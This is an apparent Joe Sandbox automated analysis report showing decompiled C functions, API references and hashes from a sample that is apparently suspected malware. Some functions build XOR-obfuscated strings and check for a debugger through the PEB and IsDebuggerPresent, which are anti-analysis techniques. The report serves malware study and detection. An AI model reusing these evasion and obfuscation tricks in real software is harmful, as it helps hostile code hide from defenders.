				_t366 = _t405;
				_v76 = _t217;
				_v72 = _t217;
				_t304 =  &_v79;
				_v71 = 0;
				_t392 = _t304 + 1;
				 *((intOrPtr*)(_t366 + 0x10)) = 0;
				 *((intOrPtr*)(_t366 + 0x14)) = 0xf;
				 *_t366 = 0;
				do {
					_t218 =  *_t304;
					_t304 = _t304 + 1;
				} while (_t218 != 0);
				_push(_t304 - _t392);
				E003B51D0(_t366, _t366,  &_v79);
				_push(0x749c888);
				E003B3130( &_v276, _t366);
				_v8 = 3;
				_v60 = 0x3d;
				_v59 = 0x0000007f ^ _v60;
				_v53 = 0;
				_v53 = 0;
				_v58 = 0xa;
				_v57 = 2;
				_v55 = 0x5e;
				_v54 = 0x56;
				_t406 = _t405 - 0x18;
				_v56 = 0;
				_t371 = _t406;
				_t312 =  &_v59;
				_t393 = _t312 + 1;
				 *((intOrPtr*)(_t371 + 0x10)) = 0;
				 *((intOrPtr*)(_t371 + 0x14)) = 0xf;
				 *_t371 = 0;
				do {
					_t227 =  *_t312;
					_t312 = _t312 + 1;
				} while (_t227 != 0);
				_push(_t312 - _t393);
				E003B51D0(_t371, _t371,  &_v59);
				_push(0x684c60bc);
				E003B3130( &_v248, _t371);
				_v8 = 4;
				_v68 = 0x74;
				_v67 = 0x0000003c ^ _v68;
				_v61 = 0;
				_v61 = 0;
				_v66 = 0xa;
				_v65 = 0x1f;
				_v63 = 0x18;
				_v62 = 0xd;
				_t407 = _t406 - 0x18;
				_v64 = 0;
				_t376 = _t407;
				_t320 =  &_v67;
				_t394 = _t320 + 1;
				 *((intOrPtr*)(_t376 + 0x10)) = 0;
				 *((intOrPtr*)(_t376 + 0x14)) = 0xf;
				 *_t376 = 0;
				do {
					_t236 =  *_t320;
					_t320 = _t320 + 1;
				} while (_t236 != 0);
				_push(_t320 - _t394);
				E003B51D0(_t376, _t376,  &_v67);
				_push(0xd41025be);
				E003B3130( &_v220, _t376);
				_v8 = 5;
				_v100 = 0x40;
				_v95 = 0;
				_v95 = 0;
				_v97 = 0x6d;
				_v99 = 0x69;
				_v98 = 0x79;
				_t408 = _t407 - 0x18;
				_v96 = 0x10;
				_t379 = _t408;
				_t327 =  &_v99;
				_t395 = _t327 + 1;
				 *((intOrPtr*)(_t379 + 0x10)) = 0;
				 *((intOrPtr*)(_t379 + 0x14)) = 0xf;
				 *_t379 = 0;
				do {
					_t244 =  *_t327;
					_t327 = _t327 + 1;
				} while (_t244 != 0);
				_push(_t327 - _t395);
				E003B51D0(_t379, _t379,  &_v99);
				_push(0xb96f42b0);
				E003B3130( &_v192, _t379);
				_v8 = 6;
				_v32 = 0x18;
				_v29 = 0;
				_v30 = 0x48;
				_v29 = 0;
				_t409 = _t408 - 0x18;
				_v31 = 0x47;
				_t381 = _t409;
				_t333 =  &_v31;
				_t396 = _t333 + 1;
				 *((intOrPtr*)(_t381 + 0x10)) = 0;
				 *((intOrPtr*)(_t381 + 0x14)) = 0xf;
				 *_t381 = 0;
				do {
					_t250 =  *_t333;
					_t333 = _t333 + 1;
				} while (_t250 != 0);
				_push(_t333 - _t396);
				E003B51D0(_t381, _t381,  &_v31);
				_push(0x1890c5de);
				E003B3130( &_v164, _t381);
				_v8 = 7;
				_v92 = 0x45;
				_v91 = 0x00000021 ^ _v92;
				_v25 = 0x37;
				_v90 = 0x00000036 ^ _v92;
				_t340 = _v92;
				_v18 = 0x24;
				_t385 = 0x0000002d ^ _t340 ^ _t340;
				_v17 = 0x2c;
				_v85 = _v18 ^ _t340;
				_t341 = _t340 ^ _t340;
				_v89 = _t385;
				_v84 = _v17 ^ _t341;
				_t263 = _v25 ^ _t341;
				_v86 = _t385;
				_v82 = 0;
				_t386 = _t409 - 0x18;
				_v87 = _t341;
				_v88 = _t263;
				_t342 =  &_v91;
				_v83 = _t263;
				_t397 = _t342 + 1;
				_v82 = 0;
				 *((intOrPtr*)(_t386 + 0x10)) = 0;
				 *((intOrPtr*)(_t386 + 0x14)) = 0xf;
				 *_t386 = 0;
				do {
					_t264 =  *_t342;
					_t342 = _t342 + 1;
				} while (_t264 != 0);
				_push(_t342 - _t397);
				E003B51D0(_t386, _t386,  &_v91);
				_push(0x68c5f9d6);
				E003B3130( &_v136, _t386);
				_v8 = 8;
				_push(_v24);
				 *0x6f6310 = 0;
				 *0x6f6314 = 0;
				 *0x6f6318 = 0;
				E003B56B0(__ebx, __edi,  &_v360,  &_v108);
				_push(E003B32B0);
				_push(9);
				_push(0x1c);
				_v8 = 0xffffffff;
				_push( &_v360);
				E003BE411();
				_t273 = E003BE777(_t342 - _t397, 0x3c0100);
				 *[fs:0x0] = _v16;
				return _t273;
			}

0x003b29d3
0x003b29d5
0x003b29e0
0x003b29e8
0x003b29ef
0x003b29f3
0x003b29f9
0x003b2a01
0x003b2a0a
0x003b2a16
0x003b2a20
0x003b2a25
0x003b2a2a
0x003b2a2d
0x003b2a30
0x003b2a33
0x003b2a35
0x003b2a38
0x003b2a3b
0x003b2a3e
0x003b2a45
0x003b2a4c
0x003b2a50
0x003b2a50
0x003b2a52
0x003b2a53
0x003b2a5c
0x003b2a60
0x003b2a65
0x003b2a70
0x003b2a75
0x003b2a7e
0x003b2a89
0x003b2a8e
0x003b2a95
0x003b2a99
0x003b2a9b
0x003b2a9f
0x003b2aa1
0x003b2aa6
0x003b2aab
0x003b2ab0
0x003b2ab6
0x003b2ab9
0x003b2abc
0x003b2abf
0x003b2ac2
0x003b2ac5
0x003b2ac7
0x003b2aca
0x003b2ace
0x003b2ad5
0x003b2adc
0x003b2ae0
0x003b2ae0
0x003b2ae2
0x003b2ae3
0x003b2aec
0x003b2af0
0x003b2af5
0x003b2b00
0x003b2b05
0x003b2b0d
0x003b2b12
0x003b2b18
0x003b2b22
0x003b2b27
0x003b2b2c
0x003b2b31
0x003b2b36
0x003b2b39
0x003b2b3c
0x003b2b3f
0x003b2b41
0x003b2b44
0x003b2b4b
0x003b2b52
0x003b2b55
0x003b2b55
0x003b2b57
0x003b2b58
0x003b2b61
0x003b2b65
0x003b2b6a
0x003b2b75
0x003b2b7a
0x003b2b80
0x003b2b8b
0x003b2b95
0x003b2b9d
0x003b2ba0
0x003b2ba5
0x003b2ba9
0x003b2bb1
0x003b2bb5
0x003b2bb8
0x003b2bba
0x003b2bbd
0x003b2bbf
0x003b2bc3
0x003b2bc6
0x003b2bc9
0x003b2bcb
0x003b2bce
0x003b2bd1
0x003b2bd4
0x003b2bd8
0x003b2bdb
0x003b2be2
0x003b2be9
0x003b2bf0
0x003b2bf0
0x003b2bf2
0x003b2bf3
0x003b2bfc
0x003b2c00
0x003b2c05
0x003b2c10
0x003b2c15
0x003b2c1b
0x003b2c26
0x003b2c32
0x003b2c38
0x003b2c3e
0x003b2c43
0x003b2c48
0x003b2c4d
0x003b2c50
0x003b2c53
0x003b2c56
0x003b2c58
0x003b2c5b
0x003b2c5e
0x003b2c65
0x003b2c6c
0x003b2c70
0x003b2c70
0x003b2c72
0x003b2c73
0x003b2c7c
0x003b2c80
0x003b2c85
0x003b2c90
0x003b2c95
0x003b2c9b
0x003b2ca6
0x003b2cb2
0x003b2cb8
0x003b2cbe
0x003b2cc3
0x003b2cc8
0x003b2ccd
0x003b2cd0
0x003b2cd3
0x003b2cd6
0x003b2cd8
0x003b2cdb
0x003b2cde
0x003b2ce5
0x003b2cec
0x003b2cf0
0x003b2cf0
0x003b2cf2
0x003b2cf3
0x003b2cfc
0x003b2d00
0x003b2d05
0x003b2d10
0x003b2d15
0x003b2d1d
0x003b2d22
0x003b2d28
0x003b2d2e
0x003b2d37
0x003b2d3c
0x003b2d3f
0x003b2d42
0x003b2d45
0x003b2d47
0x003b2d4a
0x003b2d4d
0x003b2d54
0x003b2d5b
0x003b2d60
0x003b2d60
0x003b2d62
0x003b2d63
0x003b2d6c
0x003b2d70
0x003b2d75
0x003b2d80
0x003b2d85
0x003b2d8d
0x003b2d92
0x003b2d98
0x003b2d9d
0x003b2da1
0x003b2da4
0x003b2da7
0x003b2da9
0x003b2dac
0x003b2daf
0x003b2db6
0x003b2dbd
0x003b2dc0
0x003b2dc0
0x003b2dc2
0x003b2dc3
0x003b2dcc
0x003b2dd0
0x003b2dd5
0x003b2de0
0x003b2de5
0x003b2deb
0x003b2df6
0x003b2dfb
0x003b2e05
0x003b2e08
0x003b2e0b
0x003b2e13
0x003b2e17
0x003b2e1b
0x003b2e23
0x003b2e27
0x003b2e2a
0x003b2e30
0x003b2e32
0x003b2e38
0x003b2e3c
0x003b2e3e
0x003b2e41
0x003b2e44
0x003b2e47
0x003b2e4a
0x003b2e4d
0x003b2e51
0x003b2e58
0x003b2e5f
0x003b2e62
0x003b2e62
0x003b2e64
0x003b2e65
0x003b2e6e
0x003b2e72
0x003b2e77
0x003b2e82
0x003b2e87
0x003b2e91
0x003b2e94
0x003b2ea5
0x003b2eb0
0x003b2eba
0x003b2ebf
0x003b2ec4
0x003b2ec6
0x003b2ece
0x003b2ed5
0x003b2ed6
0x003b2ee0
0x003b2eeb
0x003b2ef7

Strings

, xrefs: 003B2A7E
[^K/, xrefs: 003B29E8
E, xrefs: 003B2DEB
t, xrefs: 003B2C9B
=, xrefs: 003B2C1B
,, xrefs: 003B2E17
n, xrefs: 003B2BA5

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: __onexit
String ID: $,$=$E$[^K/$n$t
API String ID: 1448380652-1409728971
Opcode ID: 68181de58335a73f45295f3f2d27b5f047ea383edd147043c5b87b4a51101ccf
Instruction ID: daba7cb256e813275bd0c9994eb2c458ca0ebc0c9b64b8a57f386ca2b30e4779
Opcode Fuzzy Hash: 68181de58335a73f45295f3f2d27b5f047ea383edd147043c5b87b4a51101ccf
Instruction Fuzzy Hash: 91028A258082C8AEDF06DBB8D8547EEBFB55F26308F1851CDD4803F743C666564ADBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003BF154 Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003BF154() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v16);
				_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
				_v8 = _v8 ^ GetCurrentThreadId();
				_v8 = _v8 ^ GetCurrentProcessId();
				QueryPerformanceCounter( &_v24);
				return _v20 ^ _v24.LowPart ^ _v8 ^  &_v8;
			}

0x003bf15a
0x003bf161
0x003bf166
0x003bf172
0x003bf17b
0x003bf184
0x003bf18b
0x003bf1a0

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003BF166
GetCurrentThreadId.KERNEL32 ref: 003BF175
GetCurrentProcessId.KERNEL32 ref: 003BF17E
QueryPerformanceCounter.KERNEL32(?), ref: 003BF18B

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 6b81a41ee76be9f47e94b28f957f972db78f9e86f2dff1e7a108d7c2c39276c7
Instruction ID: 0127778c68cf83d0ec1b4ca5d436c0c8281fc451b1409a26f3e0230cfaba3519
Opcode Fuzzy Hash: 6b81a41ee76be9f47e94b28f957f972db78f9e86f2dff1e7a108d7c2c39276c7
Instruction Fuzzy Hash: FEF0AF74C10208EFCB01DBB0CA49A9EBBF8FF18305F9144969402E7111D734AB48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 003B6450 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003B6450(void* __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _t14;

				_v6 = 0;
				_v7 = 0;
				_v5 = 0;
				_t14 =  *[fs:0x30];
				_v5 =  *((intOrPtr*)(_t14 + 2));
				 *((char*)(_t14 + 2)) = 1;
				_v6 = 1;
				_v7 = IsDebuggerPresent();
				 *((char*)(_v5 + 2)) = _v5;
				if(_v6 != 1 || _v5 == 1 || _v7 != 1) {
					return 1;
				} else {
					return 0;
				}
			}

0x003b6455
0x003b6459
0x003b645d
0x003b6461
0x003b646a
0x003b646d
0x003b6471
0x003b647a
0x003b6486
0x003b648d
0x003b64a8
0x003b649b
0x003b64a1
0x003b64a1

APIs

IsDebuggerPresent.KERNEL32(76C84DE0,?,?,003B65B5), ref: 003B6475

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: d0ad6cc25d002b1407ed3fcb320db5dda438dc8fbaa580f9d6840bc5a636e59d
Instruction ID: fadd9a19af7057255c68c30d0a200cfbc33f5e4ea64f6169b78b2f9a70152286
Opcode Fuzzy Hash: d0ad6cc25d002b1407ed3fcb320db5dda438dc8fbaa580f9d6840bc5a636e59d
Instruction Fuzzy Hash: 41F0CD258496C879DB13C7AA8517BDEBFB49B26318F0D80C9D88817643C1AE56499362

Uniqueness

Uniqueness Score: -1.00%

Function 003B64B0 Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003B64B0(void* __ecx) {
				char _v5;

				_v5 = 0;
				_v5 =  *((intOrPtr*)( *[fs:0x30] + 2));
				return _v5;
			}

0x003b64b5
0x003b64c2
0x003b64cc

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540563a3c8d0d0acbe3e18bc2bcd07842759d0346227693d3a9e7ce7110f80e9
Instruction ID: a321b17f56ee99738d8f882b3ce9b01a67b264dc128272e43d4add35231d7315
Opcode Fuzzy Hash: 540563a3c8d0d0acbe3e18bc2bcd07842759d0346227693d3a9e7ce7110f80e9
Instruction Fuzzy Hash: CFD0121558E3CCAEC702C7A99465BEAFFBCD71B510F4841C5D88853702D16B5609C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 003BDEF0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(4B5EE95B,00000000,?), ref: 003BDF36
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 003BDF54
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 003BDF7E
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 003BDF98
?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000022,00000040), ref: 003BDFC5
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,?,?,?,?,003BD13F,?,?,00000000), ref: 003BDFE2
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,?,003BD13F), ref: 003BE00A
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?), ref: 003BE04E

Part of subcall function 003BE210: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,4B5EE95B,?,00000000,?,?,?,00000000,003BF791,000000FF,?,003BE05F), ref: 003BE242
Part of subcall function 003BE210: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE25D
Part of subcall function 003BE210: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE281
Part of subcall function 003BE210: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000000,?,?,00000000,003BF791,000000FF), ref: 003BE2A2
Part of subcall function 003BE210: std::_Facet_Register.LIBCPMT ref: 003BE2BB
Part of subcall function 003BE210: ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE2D6

?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140 ref: 003BE063
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 003BE07B
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,?,?,?,?,?,003BD13F,?,?,00000000), ref: 003BE0AC

Strings

[^K/, xrefs: 003BDF04

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID: [^K/
API String ID: 3067465659-4166871755
Opcode ID: fd455843871cc3411c222d3301ec6271c15ce3051feca890a00400e7cee9e642
Instruction ID: 7fde1946b3b2978af493757e2681f75124a4ce8542a18247e9bde9fe5b2d7a65
Opcode Fuzzy Hash: fd455843871cc3411c222d3301ec6271c15ce3051feca890a00400e7cee9e642
Instruction Fuzzy Hash: E5514CB4A00205DFDB15CF69C888B99BBF8FF49308F14415AE906DB392D7B5A944CF91

Uniqueness

Uniqueness Score: -1.00%

Function 003B9D80 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 258
sleepCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E003B9D80(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t81;
				int _t93;
				intOrPtr* _t101;
				intOrPtr _t107;
				intOrPtr _t112;
				intOrPtr _t116;
				int _t117;
				struct HMIDISTRM__* _t120;
				signed int _t124;
				intOrPtr _t126;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				signed int _t147;
				intOrPtr _t148;
				void* _t149;
				signed int _t151;
				intOrPtr _t155;
				intOrPtr* _t163;
				intOrPtr _t165;
				signed int _t173;
				intOrPtr _t174;
				void* _t176;
				void* _t177;
				void* _t178;
				intOrPtr* _t181;
				intOrPtr _t182;
				signed int _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t189;
				void* _t190;
				signed int _t191;
				void* _t211;

				_t81 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t81 ^ _t189;
				while(1) {
					_t136 =  *0x6f6320; // 0x0
					_t137 = _t136 -  *0x6f631c;
					if((0x38e38e39 * (_t136 -  *0x6f631c) >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 * (_t136 -  *0x6f631c) >> 0x20 >> 3) < 1) {
						break;
					}
					_t93 =  *0x6f6338; // 0x0
					if(_t93 < 1) {
						__imp___time64(0);
						srand(_t93);
						_t155 =  *0x6f6320; // 0x0
						_t168 = 0x38e38e39 * (_t155 -  *0x6f631c) >> 0x20 >> 3;
						_t124 = rand();
						_t191 = _t190 - 0x1c;
						_t170 = _t124 % ((0x38e38e39 * (_t155 -  *0x6f631c) >> 0x20 >> 3 >> 0x1f) + _t168);
						_t126 =  *0x6f631c; // 0x0
						_t186 = _t191;
						_v12 = _t186;
						_t178 = _t126 + (_t124 % ((0x38e38e39 * (_t155 -  *0x6f631c) >> 0x20 >> 3 >> 0x1f) + _t168) + _t124 % ((0x38e38e39 * (_t155 -  *0x6f631c) >> 0x20 >> 3 >> 0x1f) + _t168) * 8) * 4;
						_t137 = _t186;
						E003B4F40(_t186, _t124 % ((0x38e38e39 * (_t155 -  *0x6f631c) >> 0x20 >> 3 >> 0x1f) + _t168), _t178);
						 *((intOrPtr*)(_t186 + 0x18)) =  *((intOrPtr*)(_t178 + 0x18));
						 *((intOrPtr*)(_t186 + 0x1c)) =  *((intOrPtr*)(_t178 + 0x1c));
						 *((intOrPtr*)(_t186 + 0x20)) =  *((intOrPtr*)(_t178 + 0x20));
						E003B9940(_t170, _t178);
						_t93 =  *0x6f6338; // 0x0
						_t190 = _t191 + 0x24;
					}
					_t181 =  *0x6f6300; // 0x0
					if(_t181 == 0) {
						L25:
						E003B8460(_t181, 0);
						_t134 =  *0x6f6320; // 0x0
						_t182 =  *0x6f631c; // 0x0
						_v16 = 0;
						_t161 = 0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3;
						if((0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3) == 0) {
							L55:
							_push(0);
							E003B51D0(0x6f6328, _t161, 0x3c145d);
							continue;
						}
						_t173 = 0;
						_v12 = 0;
						do {
							_t101 = _t173 + _t182;
							_t174 =  *((intOrPtr*)(_t101 + 0x10));
							_t163 =  >=  ?  *0x6f6328 : 0x6f6328;
							_t187 = _t101;
							if( *((intOrPtr*)(_t101 + 0x14)) >= 0x10) {
								_t187 =  *_t101;
							}
							_t211 = _t174 -  *0x6f6338; // 0x0
							if(_t211 == 0) {
								_t176 = _t174 - 4;
								if(_t176 < 0) {
									L33:
									if(_t176 == 0xfffffffc) {
										L42:
										_t147 = 0;
										L43:
										if(_t147 != 0) {
											goto L54;
										}
										_t177 = _t101 + 0x24;
										if(_t177 == _t134) {
											L48:
											_t148 =  *((intOrPtr*)(_t134 - 0x10));
											if(_t148 < 0x10) {
												L53:
												 *((intOrPtr*)(_t134 - 0x14)) = 0;
												 *((intOrPtr*)(_t134 - 0x10)) = 0xf;
												 *((char*)(_t134 - 0x24)) = 0;
												_t135 =  *0x6f6320; // 0x0
												_t134 = _t135 - 0x24;
												 *0x6f6320 = _t134;
												goto L54;
											}
											_t107 =  *((intOrPtr*)(_t134 - 0x24));
											_t149 = _t148 + 1;
											if(_t149 < 0x1000) {
												L52:
												_push(_t149);
												E003BE78C(_t107, _t107);
												_t190 = _t190 + 8;
												goto L53;
											}
											_t165 =  *((intOrPtr*)(_t107 - 4));
											_t149 = _t149 + 0x23;
											if(_t107 - _t165 + 0xfffffffc > 0x1f) {
												__imp___invalid_parameter_noinfo_noreturn();
												goto L57;
											}
											_t107 = _t165;
											goto L52;
										}
										_t188 = _t177 - 8;
										do {
											E003B4E60(_t188 - 0x1c, _t177);
											_t112 =  *((intOrPtr*)(_t188 + 0x20));
											_t188 = _t188 + 0x24;
											 *((intOrPtr*)(_t188 - 0x28)) = _t112;
											_t177 = _t177 + 0x24;
											 *((intOrPtr*)(_t188 - 0x24)) =  *_t188;
											 *((intOrPtr*)(_t188 - 0x20)) =  *((intOrPtr*)(_t188 + 4));
										} while (_t177 != _t134);
										_t134 =  *0x6f6320; // 0x0
										goto L48;
									}
									L34:
									_t151 =  *_t187;
									if(_t151 !=  *_t163) {
										L41:
										asm("sbb ecx, ecx");
										_t147 = _t151 | 0x00000001;
										goto L43;
									}
									if(_t176 == 0xfffffffd) {
										goto L42;
									}
									_t151 =  *((intOrPtr*)(_t187 + 1));
									_t51 = _t163 + 1; // 0x0
									if(_t151 !=  *_t51) {
										goto L41;
									}
									if(_t176 == 0xfffffffe) {
										goto L42;
									}
									_t151 =  *((intOrPtr*)(_t187 + 2));
									_t53 = _t163 + 2; // 0x0
									if(_t151 !=  *_t53) {
										goto L41;
									}
									if(_t176 == 0xffffffff) {
										goto L42;
									}
									_t151 =  *((intOrPtr*)(_t187 + 3));
									_t55 = _t163 + 3; // 0x0
									if(_t151 ==  *_t55) {
										goto L42;
									}
									goto L41;
								}
								while( *_t187 ==  *_t163) {
									_t187 = _t187 + 4;
									_t163 = _t163 + 4;
									_t176 = _t176 - 4;
									if(_t176 >= 0) {
										continue;
									}
									goto L33;
								}
								goto L34;
							}
							L54:
							_t182 =  *0x6f631c; // 0x0
							_v16 = _v16 + 1;
							_t173 = _v12 + 0x24;
							_t161 = 0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3;
							_v12 = _t173;
						} while (_v16 < (0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 * (_t134 - _t182) >> 0x20 >> 3));
						goto L55;
					} else {
						if(_t93 <= 1) {
							L19:
							if(_t181 == 0) {
								goto L25;
							}
							while( *((intOrPtr*)(_t181 + 0x18)) != 0) {
								if( *((intOrPtr*)(_t181 + 0x50)) == 0x12c &&  *((intOrPtr*)(_t181 + 0x48)) == 2) {
									 *((intOrPtr*)(_t181 + 0x18)) = 0;
								}
								Sleep(0x64);
								_t181 =  *0x6f6300; // 0x0
								if(_t181 != 0) {
									continue;
								} else {
